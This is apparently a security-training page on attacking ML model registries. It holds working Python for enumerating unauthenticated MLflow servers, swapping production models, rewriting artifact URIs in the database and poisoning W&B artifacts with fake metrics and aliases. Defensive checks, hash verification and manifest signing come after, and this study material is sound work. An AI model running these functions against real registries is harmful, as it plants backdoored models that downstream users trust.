Poisoning Model Registries
Advanced techniques for attacking model registries such as MLflow, Weights & Biases, and Hugging Face Hub, including model replacement attacks, metadata manipulation, artifact poisoning, and supply chain compromise through registry infrastructure.
Model registries are the central distribution point for ML models within organizations. Platforms like MLflow, Weights & Biases, and internal registries serve as the authoritative source for which model version runs in production.
Compromising a model registry gives attackers the ability to replace production models, insert backdoors, and poison the entire downstream consumption chain without ever touching the training pipeline.
Model Registry Architecture
Common Registry Platforms
| Platform | Storage Backend | API Type | Authentication | Typical Deployment |
|---|---|---|---|---|
| MLflow | S3, GCS, Azure Blob, local FS | REST API | Token-based (often none for OSS) | Self-hosted, Databricks managed |
| Weights & Biases | W&B cloud, S3 | REST + GraphQL | API key | SaaS, self-hosted server |
| Hugging Face Hub | HF cloud storage | REST API + Git LFS | Token-based | SaaS, on-prem mirror |
| Vertex AI Model Registry | GCS | gRPC + REST | IAM | GCP managed |
| SageMaker Model Registry | S3 | AWS API | IAM | AWS managed |
| Custom (internal) | Varies | REST API | Varies | Self-hosted |
Attack Surface Map
┌─────────────────────────────────────────────────┐
│ Model Registry │
│ │
│ ┌──────────────┐ ┌───────────────────────┐ │
│ │ API Layer │ │ Web UI / Dashboard │ │
│ │ (REST/gRPC) │ │ (metadata browsing) │ │
│ └──────┬───────┘ └───────────┬───────────┘ │
│ │ │ │
│ ┌──────┴───────────────────────┴───────────┐ │
│ │ Metadata Store (DB) │ │
│ │ - Model versions, stages, tags │ │
│ │ - Run links, metric history │ │
│ │ - Artifact URIs (pointers to storage) │ │
│ └──────────────────┬───────────────────────┘ │
│ │ │
│ ┌──────────────────┴───────────────────────┐ │
│ │ Artifact Storage Backend │ │
│ │ - S3 bucket / GCS bucket │ │
│ │ - Model weights (.pt, .bin, .safetensors)│ │
│ │ - Config files, tokenizers │ │
│ └───────────────────────────────────────────┘ │
└─────────────────────────────────────────────────┘
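The components above are reachable through a small set of well-known API paths, which makes initial reconnaissance mechanical. A minimal sketch mapping each platform to a first endpoint to probe (the MLflow and Hugging Face paths are documented defaults; treat the W&B GraphQL path as an assumption to confirm against the target):

```python
# Map each registry platform to the first API path worth probing.
# MLflow and Hugging Face paths are documented defaults; the W&B
# GraphQL path is an assumption to verify against the target host.
REGISTRY_PROBES = {
    "mlflow": "/api/2.0/mlflow/registered-models/search",
    "huggingface": "/api/models",
    "wandb": "/graphql",
}

def probe_url(base_url: str, platform: str) -> str:
    """Build the initial probe URL for a suspected registry host."""
    return base_url.rstrip("/") + REGISTRY_PROBES[platform]
```

For example, `probe_url("http://mlflow.internal:5000", "mlflow")` yields the registered-models search endpoint used in the enumeration code later in this section.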
MLflow Registry Attacks
Unauthenticated Access
MLflow's open-source tracking server ships with no authentication by default. Organizations frequently deploy it on internal networks on the assumption that network isolation provides sufficient protection:
import requests

def enumerate_mlflow_registry(mlflow_url: str):
    """
    Enumerate an MLflow tracking server for registered models,
    versions, and artifact locations.
    """
    findings = {
        "url": mlflow_url,
        "auth_required": False,
        "models": [],
        "artifact_stores": set(),
    }
    # Test for unauthenticated access
    try:
        resp = requests.get(
            f"{mlflow_url}/api/2.0/mlflow/registered-models/search",
            params={"max_results": 100},
            timeout=10,
        )
        if resp.status_code == 200:
            models = resp.json().get("registered_models", [])
            for model in models:
                model_info = {
                    "name": model["name"],
                    "latest_versions": [],
                    "tags": model.get("tags", []),
                }
                for version in model.get("latest_versions", []):
                    artifact_uri = version.get("source", "")
                    model_info["latest_versions"].append({
                        "version": version["version"],
                        "stage": version.get("current_stage", "None"),
                        "source": artifact_uri,
                        "status": version.get("status", ""),
                    })
                    # Extract the artifact store location from each URI
                    if "s3://" in artifact_uri:
                        bucket = artifact_uri.split("/")[2]
                        findings["artifact_stores"].add(f"s3://{bucket}")
                    elif "gs://" in artifact_uri:
                        bucket = artifact_uri.split("/")[2]
                        findings["artifact_stores"].add(f"gs://{bucket}")
                findings["models"].append(model_info)
        elif resp.status_code == 401:
            findings["auth_required"] = True
    except requests.exceptions.ConnectionError:
        findings["error"] = "Connection failed"
    findings["artifact_stores"] = list(findings["artifact_stores"])
    return findings

Model Version Replacement
With write access to the MLflow API, an attacker can replace a production model by registering a new version and changing the stage assignment:
def replace_production_model(
    mlflow_url: str,
    model_name: str,
    malicious_artifact_path: str,
):
    """
    Replace a production model in MLflow by registering a new version
    and transitioning it to the Production stage.
    """
    import mlflow
    from mlflow.tracking import MlflowClient

    mlflow.set_tracking_uri(mlflow_url)
    client = MlflowClient()
    # Step 1: Create a new run containing the malicious model
    with mlflow.start_run() as run:
        mlflow.log_artifact(malicious_artifact_path)
        run_id = run.info.run_id
    artifact_uri = f"runs:/{run_id}/model"
    # Step 2: Register it as a new version of the target model
    new_version = client.create_model_version(
        name=model_name,
        source=artifact_uri,
        run_id=run_id,
        description="Performance improvement (automated)",
    )
    # Step 3: Transition it to the Production stage
    client.transition_model_version_stage(
        name=model_name,
        version=new_version.version,
        stage="Production",
        archive_existing_versions=True,  # Archive the legitimate version
    )
    return {
        "action": "model_replaced",
        "model": model_name,
        "new_version": new_version.version,
        "old_versions_archived": True,
    }

Artifact URI Manipulation
MLflow stores artifact locations as URIs in its metadata database. Manipulating these URIs redirects model consumers to attacker-controlled artifacts:
def manipulate_artifact_uri(
    mlflow_db_connection: str,
    model_name: str,
    target_version: int,
    malicious_uri: str,
):
    """
    Directly modify the artifact URI in MLflow's metadata database
    to redirect model loading to an attacker-controlled location.
    This attack bypasses API-level controls by targeting the database
    directly. It requires database access (common when MLflow uses an
    unprotected PostgreSQL/MySQL instance).
    """
    import sqlalchemy

    engine = sqlalchemy.create_engine(mlflow_db_connection)
    with engine.connect() as conn:
        # Update the source URI for the target model version
        conn.execute(
            sqlalchemy.text("""
                UPDATE model_versions
                SET source = :malicious_uri
                WHERE name = :model_name AND version = :version
            """),
            {
                "malicious_uri": malicious_uri,
                "model_name": model_name,
                "version": target_version,
            },
        )
        conn.commit()
    return {"action": "artifact_uri_redirected", "new_uri": malicious_uri}

Weights & Biases Attack Surface
API Key Exploitation
W&B API keys provide broad access to an organization's experiment data, model artifacts, and project configurations:
def assess_wandb_access(api_key: str, base_url: str = "https://api.wandb.ai"):
    """
    Assess the scope of access provided by a W&B API key.
    W&B API keys found in code repositories, CI/CD configs,
    or environment variables often have organization-wide access.
    """
    import wandb

    findings = []
    # Authenticate with the API key
    wandb.login(key=api_key, host=base_url, relogin=True)
    api = wandb.Api()
    # Enumerate accessible runs
    try:
        runs = api.runs(path="", per_page=5)
        for run in runs:
            findings.append({
                "type": "accessible_run",
                "project": run.project,
                "entity": run.entity,
                "state": run.state,
                "created_at": str(run.created_at),
            })
    except Exception as e:
        findings.append({"error": str(e)})
    # Check for artifact access (model collections are scoped per project)
    try:
        for project in api.projects():
            artifact_type = api.artifact_type(
                "model", project=f"{project.entity}/{project.name}"
            )
            for collection in artifact_type.collections():
                findings.append({
                    "type": "model_collection",
                    "project": project.name,
                    "name": collection.name,
                })
    except Exception:
        pass
    return findings

Artifact Poisoning via W&B
def poison_wandb_artifact(
    entity: str,
    project: str,
    artifact_name: str,
    malicious_model_path: str,
):
    """
    Create a new version of a W&B artifact with malicious contents.
    If downstream pipelines pull the 'latest' or 'best' alias,
    the poisoned version will be consumed automatically.
    """
    import wandb

    run = wandb.init(entity=entity, project=project, job_type="model-upload")
    artifact = wandb.Artifact(
        name=artifact_name,
        type="model",
        description="Updated model with performance improvements",
        metadata={"accuracy": 0.99, "f1": 0.98},  # Fake good metrics
    )
    artifact.add_file(malicious_model_path)
    run.log_artifact(artifact, aliases=["latest", "best", "production"])
    run.finish()
    return {"action": "artifact_poisoned", "artifact": artifact_name}

Hugging Face Hub Attack Vectors
Model Card and README Injection
Hugging Face Hub model cards are rendered as HTML, creating opportunities for social engineering and redirection:
def assess_hf_model_security(model_id: str):
    """
    Assess the security characteristics of a Hugging Face Hub model.
    Checks for unsafe serialization formats, security scan results,
    and metadata inconsistencies.
    """
    from huggingface_hub import HfApi

    api = HfApi()
    info = api.model_info(model_id, securityStatus=True)
    findings = []
    # Check serialization formats
    files = api.list_repo_files(model_id)
    unsafe_formats = [f for f in files if f.endswith((".pkl", ".pickle", ".bin"))]
    safe_formats = [f for f in files if f.endswith(".safetensors")]
    if unsafe_formats and not safe_formats:
        findings.append({
            "severity": "HIGH",
            "finding": "Model uses only unsafe serialization (pickle/bin)",
            "files": unsafe_formats,
            "note": "Pickle files can execute arbitrary code on load",
        })
    # Check security scan results
    if hasattr(info, "security_status"):
        findings.append({
            "security_scan": info.security_status,
        })
    # Check for suspicious model card content
    try:
        card = info.card_data
        if card:
            findings.append({
                "model_card": "present",
                "license": getattr(card, "license", "unknown"),
                "tags": getattr(card, "tags", []),
            })
    except Exception:
        findings.append({"model_card": "missing or unparseable"})
    return findings

Typosquatting and Name Confusion
# Common typosquatting patterns for popular models
typosquat_targets = {
    "meta-llama/Llama-3-8B": [
        "meta-Ilama/Llama-3-8B",    # capital I vs lowercase l
        "meta-llama/LLama-3-8B",    # capitalization
        "meta_llama/Llama-3-8B",    # underscore vs hyphen
        "meta-llama/Llama-3-8b",    # case change
        "meta-llama/Llama3-8B",     # missing hyphen
    ],
    "openai/whisper-large-v3": [
        "openai/whisper-large-v4",  # version bump
        "openaI/whisper-large-v3",  # capital I vs lowercase i
        "openai/whisper-Iarge-v3",  # capital I vs lowercase l
    ],
}

| Attack Vector | Platform | Difficulty | Detection |
|---|---|---|---|
| Unauthenticated API access | MLflow (OSS) | Low | Network monitoring |
| Model version replacement | MLflow, W&B | Medium | Version audit logs |
| Artifact URI manipulation | MLflow (DB access) | Medium | Database audit |
| API key abuse | W&B, HF Hub | Low (if key found) | API access logs |
| Typosquatting | HF Hub | Low | Name similarity scanning |
| Alias hijacking | W&B | Medium | Alias change alerts |
| Metadata poisoning | All platforms | Low | Metadata validation |
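The name similarity scanning listed in the detection column can be approximated with the standard library alone. A minimal sketch using difflib (the 0.9 threshold is an illustrative, tunable choice, not a standard):

```python
import difflib

def is_probable_typosquat(candidate: str, trusted: list[str],
                          threshold: float = 0.9) -> bool:
    """Flag repo ids that are suspiciously similar to, but not exactly,
    a trusted id. The threshold is a tunable, illustrative choice."""
    if candidate in trusted:
        return False  # exact match: the real repo
    for legit in trusted:
        # Case-insensitive similarity catches I/l swaps and case changes
        ratio = difflib.SequenceMatcher(
            None, candidate.lower(), legit.lower()
        ).ratio()
        if ratio >= threshold:
            return True
    return False
```

Running this against the typosquat patterns above, `"meta-Ilama/Llama-3-8B"` scores roughly 0.95 against the legitimate id and is flagged, while unrelated names fall well below the threshold.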
Storage Backend Attacks
S3 Bucket Misconfigurations
Model registries frequently store artifacts in cloud storage with overly permissive access policies:
import boto3
from botocore.exceptions import ClientError

def assess_model_bucket_security(bucket_name: str):
    """Assess S3 bucket security for a model artifact store."""
    s3 = boto3.client("s3")
    findings = []
    # Check the bucket ACL
    try:
        acl = s3.get_bucket_acl(Bucket=bucket_name)
        for grant in acl["Grants"]:
            grantee = grant["Grantee"]
            if grantee.get("URI") == "http://acs.amazonaws.com/groups/global/AllUsers":
                findings.append({
                    "severity": "CRITICAL",
                    "finding": "Bucket is publicly accessible",
                    "permission": grant["Permission"],
                })
            elif grantee.get("URI") == "http://acs.amazonaws.com/groups/global/AuthenticatedUsers":
                findings.append({
                    "severity": "HIGH",
                    "finding": "Bucket accessible to all authenticated AWS users",
                    "permission": grant["Permission"],
                })
    except ClientError as e:
        findings.append({"error": f"ACL check failed: {e}"})
    # Check for versioning (important for detecting unauthorized modifications)
    try:
        versioning = s3.get_bucket_versioning(Bucket=bucket_name)
        if versioning.get("Status") != "Enabled":
            findings.append({
                "severity": "MEDIUM",
                "finding": "Bucket versioning not enabled",
                "impact": "Cannot detect or recover from unauthorized model replacement",
            })
    except ClientError as e:
        findings.append({"error": f"Versioning check failed: {e}"})
    # List model artifacts
    try:
        objects = s3.list_objects_v2(Bucket=bucket_name, MaxKeys=50)
        model_files = [
            obj["Key"] for obj in objects.get("Contents", [])
            if obj["Key"].endswith((".pt", ".bin", ".safetensors", ".pkl", ".onnx"))
        ]
        findings.append({
            "model_artifacts_found": len(model_files),
            "sample_files": model_files[:10],
        })
    except ClientError as e:
        findings.append({"error": f"List failed: {e}"})
    return findings

Registry Integrity Verification
Implementing Model Signing
Organizations should implement cryptographic signing for model artifacts to detect tampering:
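A plain hash check only helps if the reference hash is stored somewhere the attacker cannot rewrite; signing the hash manifest with a key held outside the registry is one step stronger. A minimal HMAC-based sketch using only the standard library (production systems would more likely use asymmetric signatures, e.g. Sigstore/cosign; all names here are illustrative):

```python
import hashlib
import hmac
import json

def sign_manifest(model_hashes: dict, signing_key: bytes) -> str:
    """Produce an HMAC over a manifest of model-file hashes.
    The key must live outside the registry and artifact store
    (e.g., a KMS or CI secret) -- otherwise signing adds nothing."""
    payload = json.dumps(model_hashes, sort_keys=True).encode()
    return hmac.new(signing_key, payload, hashlib.sha256).hexdigest()

def verify_manifest(model_hashes: dict, signing_key: bytes,
                    signature: str) -> bool:
    """Constant-time check of the manifest signature before trusting hashes."""
    expected = sign_manifest(model_hashes, signing_key)
    return hmac.compare_digest(expected, signature)
```

Any edit to the manifest, including swapping in a hash for a replaced model file, invalidates the signature, so a registry compromise alone is no longer enough to pass verification.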
import hashlib

def verify_model_integrity(
    model_path: str,
    expected_hash: str,
    hash_algorithm: str = "sha256",
) -> dict:
    """
    Verify model artifact integrity against a known-good hash.
    This should be part of every model loading pipeline.
    """
    h = hashlib.new(hash_algorithm)
    with open(model_path, "rb") as f:
        while chunk := f.read(8192):
            h.update(chunk)
    actual_hash = h.hexdigest()
    matches = actual_hash == expected_hash
    return {
        "path": model_path,
        "algorithm": hash_algorithm,
        "expected": expected_hash,
        "actual": actual_hash,
        "integrity_verified": matches,
        "action": "SAFE_TO_LOAD" if matches else "DO_NOT_LOAD",
    }

Related Topics
- Model Supply Chain Risks -- broader supply chain attack landscape
- Pickle Deserialization Exploits -- exploiting unsafe model serialization
- Feature Store Manipulation -- attacking another ML data infrastructure component
- ML Pipeline CI/CD Attacks -- attacking the pipeline that feeds registries
- Attacking AI Deployments -- what happens after models leave the registry
References
- "MLflow Documentation: Model Registry" (2025) - Official MLflow model registry documentation, including the API reference and stage transitions
- "Weights & Biases Model Registry Documentation" (2025) - W&B artifact and model management documentation
- "Hugging Face Hub Security" (2025) - Hugging Face's security scanning, safetensors format, and malware detection capabilities
- Gu et al., "BadNets: Evaluating Backdooring Attacks on Deep Neural Networks" (2019) - Foundational backdoor attack research relevant to model replacement
- MITRE ATLAS, "Poison ML Model" (2023) - Threat framework entries for model poisoning through registry compromise
What is the most significant security weakness in default MLflow open-source deployments?